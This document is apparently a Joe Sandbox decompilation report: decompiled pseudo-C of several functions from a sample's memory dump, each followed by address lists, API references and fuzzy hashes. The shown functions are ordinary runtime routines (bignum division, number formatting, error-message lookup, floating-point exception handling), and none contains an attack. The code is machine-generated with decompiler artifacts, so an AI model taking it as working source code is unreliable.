				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00BBE600(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00BD1770(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00BBE620(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00BBE620(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xbce03d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00BD1770( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00BCB3C1(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00BCB3C1(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00BCB3C1(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x00bcca2c
0x00bcca2f
0x00bcca33
0x00bcca3d
0x00bcca40
0x00bcca42
0x00bcca44
0x00bcca51
0x00bcca51
0x00bcca54
0x00bcca54
0x00bcca57
0x00bcca5a
0x00bcca5c
0x00bccb8f
0x00bccb91
0x00bccbda
0x00bccbde
0x00bccbe4
0x00bccb93
0x00bccb95
0x00bccb98
0x00bccb9a
0x00bccb9d
0x00bccb9f
0x00bccba1
0x00bccbd5
0x00bccbd5
0x00bccbd5
0x00bccba3
0x00bccba8
0x00bccbae
0x00bccbae
0x00bccbb1
0x00bccbb3
0x00bccbb5
0x00000000
0x00000000
0x00bccbb7
0x00bccbb8
0x00bccbbb
0x00bccbbe
0x00bccbc0
0x00000000
0x00bccbc2
0x00000000
0x00bccbc2
0x00000000
0x00bccbc0
0x00bccbc4
0x00bccbcb
0x00bccbcf
0x00bccbd3
0x00000000
0x00000000
0x00bccbd3
0x00bccbd6
0x00bccbd6
0x00bccbd8
0x00bccbe5
0x00bccbe8
0x00bccbeb
0x00bccbee
0x00bccbee
0x00bccbf2
0x00bccbf5
0x00bccbf8
0x00bccbfb
0x00bccc06
0x00bccbfd
0x00bccc02
0x00bccc02
0x00bccc10
0x00bccc15
0x00bccc18
0x00bccc1a
0x00bccc24
0x00bccc27
0x00bccc2e
0x00bccc31
0x00bccc34
0x00bccc3c
0x00bccc42
0x00bccc42
0x00bccc42
0x00bccc42
0x00bccc34
0x00bccc47
0x00bccc4e
0x00bccc4e
0x00bccc51
0x00bccc54
0x00bcce86
0x00bcce86
0x00bccc5a
0x00bccc5a
0x00bccc60
0x00bccc63
0x00bccc66
0x00bccc69
0x00bccc6c
0x00bccc6f
0x00bccc72
0x00bccc72
0x00bccc75
0x00bccc7c
0x00bccc7c
0x00bccc77
0x00bccc77
0x00bccc77
0x00bccc7e
0x00bccc82
0x00bccc85
0x00bccc87
0x00bccc8a
0x00bccc91
0x00bccc94
0x00bccc97
0x00bccca2
0x00bccca5
0x00bcccaa
0x00bcccaf
0x00bcccb6
0x00bcccbb
0x00bcccbd
0x00bcccbf
0x00bcccc3
0x00bcccc6
0x00bcccc9
0x00bcccd1
0x00bcccda
0x00bcccda
0x00bcccdc
0x00bcccdf
0x00bcccdf
0x00bcccc9
0x00bccce9
0x00bcccee
0x00bcccf3
0x00bcccf5
0x00bcccf8
0x00bcccfa
0x00bcccfd
0x00bccd00
0x00bccd02
0x00bccd05
0x00bccd08
0x00bccd0a
0x00bccd11
0x00bccd16
0x00bccd19
0x00bccd23
0x00bccd25
0x00bccd27
0x00bccd2a
0x00bccd2a
0x00bccd2c
0x00bccd2f
0x00bccd32
0x00bccd35
0x00bccd38
0x00bccd0c
0x00bccd0c
0x00bccd0f
0x00000000
0x00000000
0x00bccd0f
0x00bccd3b
0x00bccd3d
0x00bccd3f
0x00000000
0x00bccd41
0x00bccd41
0x00bccd44
0x00bccd46
0x00bccd46
0x00bccd54
0x00bccd57
0x00bccd5c
0x00bccd5e
0x00000000
0x00000000
0x00bccd60
0x00bccd67
0x00bccd67
0x00bccd6a
0x00bccd6d
0x00bccd70
0x00bccd73
0x00bccd73
0x00bccd76
0x00bccd79
0x00bccd7d
0x00bccd80
0x00bccd82
0x00bccd85
0x00000000
0x00000000
0x00bccd87
0x00bccd85
0x00bccd62
0x00bccd62
0x00bccd65
0x00000000
0x00000000
0x00000000
0x00000000
0x00bccd65
0x00bccd8c
0x00bccd8c
0x00000000
0x00bccd8c
0x00bccd89
0x00000000
0x00bccd89
0x00bccd44
0x00bccd3f
0x00bccd8f
0x00bccd8f
0x00bccd91
0x00bccd9b
0x00bccd9b
0x00bccd9e
0x00bccda0
0x00bccda2
0x00bccda4
0x00bccda9
0x00bccdac
0x00bccdac
0x00bccdaf
0x00bccdb2
0x00bccdb5
0x00bccdb7
0x00bccdcc
0x00bccdce
0x00bccdd0
0x00bccdd2
0x00bccdd4
0x00bccdd6
0x00bccdd8
0x00bccdda
0x00bccddd
0x00bccddd
0x00bccde1
0x00bccde3
0x00bccde9
0x00bccdec
0x00bccdec
0x00bccdec
0x00bccdf0
0x00bccdf0
0x00bccdf5
0x00bccdf8
0x00bccdf8
0x00bccdfd
0x00bccdff
0x00bcce01
0x00bcce08
0x00bcce08
0x00bcce0a
0x00bcce0f
0x00bcce11
0x00bcce14
0x00bcce14
0x00bcce17
0x00bcce20
0x00bcce20
0x00bcce22
0x00bcce22
0x00bcce27
0x00bcce2d
0x00bcce31
0x00bcce34
0x00bcce37
0x00bcce39
0x00bcce39
0x00bcce39
0x00bcce3e
0x00bcce3e
0x00bcce41
0x00bcce44
0x00bcce03
0x00bcce03
0x00bcce06
0x00000000
0x00000000
0x00bcce06
0x00bcce01
0x00bcce4b
0x00bcce4b
0x00bcce4c
0x00bccd93
0x00bccd93
0x00bccd95
0x00000000
0x00000000
0x00bccd95
0x00bcce5c
0x00bcce61
0x00bcce64
0x00bcce68
0x00bcce69
0x00bcce6c
0x00bcce6f
0x00bcce70
0x00bcce73
0x00bcce76
0x00bcce79
0x00bcce7c
0x00bcce7c
0x00bcce84
0x00bcce8b
0x00bcce8c
0x00bcce8e
0x00bcce90
0x00bcce92
0x00bcce95
0x00bccea0
0x00bccea0
0x00bccea6
0x00bccea6
0x00bccea9
0x00bcceaa
0x00bcceaa
0x00bccea0
0x00bcceae
0x00bcceb0
0x00bcceb2
0x00bcceb4
0x00bcceb4
0x00bcceb6
0x00bcceba
0x00000000
0x00000000
0x00bccebc
0x00bccebc
0x00bccebf
0x00bccec1
0x00000000
0x00000000
0x00000000
0x00bccec1
0x00bcceb4
0x00bccec3
0x00bccecd
0x00000000
0x00000000
0x00000000
0x00bccbd8
0x00bcca62
0x00bcca62
0x00bcca62
0x00bcca65
0x00bcca68
0x00bcca6b
0x00bcca9c
0x00bcca9e
0x00bccae9
0x00bccaeb
0x00bccaf2
0x00bccaf9
0x00bccafc
0x00bccaff
0x00bccb05
0x00bccb05
0x00bccb06
0x00bccb09
0x00bccb10
0x00bccb19
0x00bccb1e
0x00bccb21
0x00bccb26
0x00bccb29
0x00bccb2b
0x00bccb30
0x00bccb33
0x00bccb36
0x00bccb36
0x00bccb36
0x00bccb3a
0x00bccb3d
0x00bccb3d
0x00bccb42
0x00bccb42
0x00bccb4d
0x00bccb58
0x00bccb58
0x00bccb5b
0x00bccb67
0x00bccb6c
0x00bccb77
0x00bccb79
0x00bccb7b
0x00bccb81
0x00bccb86
0x00bccb88
0x00bccb8e
0x00bccaa0
0x00bccaac
0x00bccaac
0x00bccaaf
0x00bccabf
0x00bccac5
0x00bccacc
0x00bccace
0x00bccad6
0x00bccad8
0x00bccada
0x00bccadf
0x00bccae2
0x00bccae8
0x00bccae8
0x00bcca6d
0x00bcca70
0x00bcca74
0x00bcca7a
0x00bcca89
0x00bcca93
0x00bcca9b
0x00bcca9b
0x00bcca6b
0x00bcca46
0x00bcca49
0x00bcca4f
0x00bcca4f
0x00bcca35
0x00bcca3b
0x00bcca3b

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a0d7a063ca18aa33b8173c25e0cabb50717dc128e3e66a33e751a7d327b1497
Instruction ID: 42469ace2e487d4c6c4901eed0299e1841f7aee96cb2fe5df50ea0d7f80ebc7a
Opcode Fuzzy Hash: 7a0d7a063ca18aa33b8173c25e0cabb50717dc128e3e66a33e751a7d327b1497
Instruction Fuzzy Hash: A9020C71E002199BDF14CFA9C890BAEBBF1EF98314F2582ADD919E7344D731AD418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA5BC Relevance: 3.0, APIs: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BBA5BC(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xbdd610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xbfdca0 = _v304;
					 *0xbfdca2 = 0;
					 *0xbdd610 = 0xbfdca0;
				}
				E00BAFC65(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xbdd600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}

0x00bba5d4
0x00bba5e2
0x00bba5ef
0x00bba5f7
0x00bba5fd
0x00bba5fd
0x00bba613
0x00bba618
0x00bba61d
0x00bba627
0x00bba631
0x00bba639
0x00bba644

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BBA5E2
GetNumberFormatW.KERNEL32 ref: 00BBA631

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: d834b98c19fcd17c31b3d89e585873231db3a2ce3ece4054cb5fb1873565a099
Instruction ID: 1fbaf5e9b95b0df8a147cbf4a9867940e72c1fbbba2d8f0a3cfc46973834c981
Opcode Fuzzy Hash: d834b98c19fcd17c31b3d89e585873231db3a2ce3ece4054cb5fb1873565a099
Instruction Fuzzy Hash: 58017C76540209AEDB109FA5DC45FABB7FCEF09710F405462FA08E7160EBB09924DBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00BA6E5E Relevance: 3.0, APIs: 2, Instructions: 17
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00BA6E5E(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}

0x00ba6e5e
0x00ba6e66
0x00000000
0x00ba6e8d
0x00ba6e7f
0x00ba6e87
0x00000000

APIs

GetLastError.KERNEL32(00BB10D8,?,00000200), ref: 00BA6E5E
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00BA6E7F

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ddd51a09422a0958e864ba82f62ef594981bcaa89ab1919fe9e0b6cb81ccf3e2
Instruction ID: ec00b6d148fd98ed6db55a59e6ec3cd36b8236983294edd7215c002180b87189
Opcode Fuzzy Hash: ddd51a09422a0958e864ba82f62ef594981bcaa89ab1919fe9e0b6cb81ccf3e2
Instruction Fuzzy Hash: 2DD0A974388302BEFA100F30CC26F2AB7D0A726B82F20CA10B302EA0E0DA708015D628

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0FD4 Relevance: 1.8, APIs: 1, Instructions: 269
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BD0FD4(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00BCE932(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00BCE898(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
